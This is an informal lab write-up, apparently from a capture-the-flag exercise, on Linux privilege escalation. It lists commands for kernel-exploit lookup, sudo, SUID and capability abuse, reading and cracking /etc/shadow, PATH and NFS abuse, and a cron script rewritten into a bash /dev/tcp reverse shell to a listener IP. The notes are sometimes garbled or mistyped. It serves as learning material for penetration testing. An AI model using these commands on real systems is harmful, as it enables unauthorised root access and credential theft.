LineKernel
Abdelrahman Ali Abdelaziz
Privilege escalation occurs when a computer user exploits system vulnerabilities or misconfigurations to gain access to other user accounts within a computer system. By obtaining access to these accounts, they can access additional files and execute administrative commands.
In privilege escalations, there are two types of privilege escalations
1. Vertical privilege escalation.
2. Horizontal privilege escalation.
Enumeration
The hostname command will return the hostname of the target machine
hostname
or
uname -n
To get the Linux Kernel Version Use uname -r
uname -r 
python version
python -V
cat /etc/issuse
initial Access
The kernel is the central program within a computer's operating system, holding full control over all aspects of the system. It is the part of the operating system that always remains in memory, enabling communication between hardware and software components. Typically written in a low-level language like C, the kernel is susceptible to binary exploitation techniques, which can be used to uncover vulnerabilities.
If you want to gain privilege escalation you can search for a POC using
cat /proc/version
uname -a
searchsploit "Linux Kernel version" or search in Google site:exploit-db.com "Linux kernel versionok I will search for the version of kernel-vulnerable
I found CVE-2015-1328
Ubuntu 14.04 - Linux ubuntu 3.13.0-24-generic #46-Ubuntu x86_64
gcc exploit.c -o exploit
privEsc
programs that the user can sudo
By running sudo -l we can see all the binaries a user can do. we first run sudo -l
User karen may run the following commands on ip-10-10-202-96:
(ALL) NOPASSWD: /usr/bin/find
(ALL) NOPASSWD: /usr/bin/less
(ALL) NOPASSWD: /usr/bin/nanosudo less flag2.txt
To get a password Frank uses sudo less /etc/shadow
Privilege Escalation: SUID
We run the command
If the binary can lead to a privilege escalation
find / -type f -perm -04000 -ls 2>/dev/null
i searched i google to find the privisc using base64
base64 "$LFILE" | base64 --decode
unshasow
unshadow pass.txt shadow.txt > passshadow.txt
john passshadow.txt
Limited capabilities
Remember
If the permission of a binary can lead to a privilege escalation
We search for this flaw using getcap.
getcap -r / 2>/dev/null/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/home/karen/vim = cap_setuid+ep
/home/ubuntu/view = cap_setuid+epi searched i google to find the privisc using capabilities
vim -c `:py3 import os; os.setuid(0); os.excel("/bin/sh", "sh", "-c", "reset; exec sh")'
crontab
Cron => used to create job scheduling in Linux
first, check for crontab config
/etc/crontabcheck all files u found check any think
We first check /karen/backup.sh
We first modify /Karen/backup.sh since we have permission
#!/bin/bash
bash -i >& /dev/tcp/10.21.32.157/4444 0>&1
chmod 777 backup.sh
#set Revers shell in attacker
nc -nvlp 4444
unshadow pass.txt shadow.txt > passshadow.txt
john passshadow.txt
Privilege Escalation: PATH
find the files writeable
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
export PATH=/tmp:$PATH
Privilege Escalation: NFS
Exploiting the Network File Sharing Protocol
Network File Sharing (NFS) is a protocol allowing you to share directories and files with other Linux clients over a network
cat /etc/exportsRead the _ /etc/exports _ file, if you find some directory that is configured as no_root_squash, then you can access it from as a client and write inside that directory as if you were the local root of the machine.
showmount -e <you-ip>
Mounting that directory in a client machine, and as root copying inside the mounted folder our come compiled payload that will abuse the SUID permission, give to it SUID rights, and execute from the victim machine that binary (you can find here some C SUID payloads).
#Attacker, as root user gcc -static payload.c -o payload mkdir /tmp/pe mount -o rw <IP>:<SHARED_FOLDER> /tmp/pe cd /tmp/pe cp /tmp/payload chmod +s payload #Victim cd <SHAREDD_FOLDER> ./payload
Capstone Project
Enumeration
Find the SUID
find / -type f -perm -04000 -ls 2>/dev/null
unshadow
su missy
check the sudo
sudo -l
sudo Find
sudo find . -exec /bin/sh \; -quit
Exploit Resources
other Resources
Last updated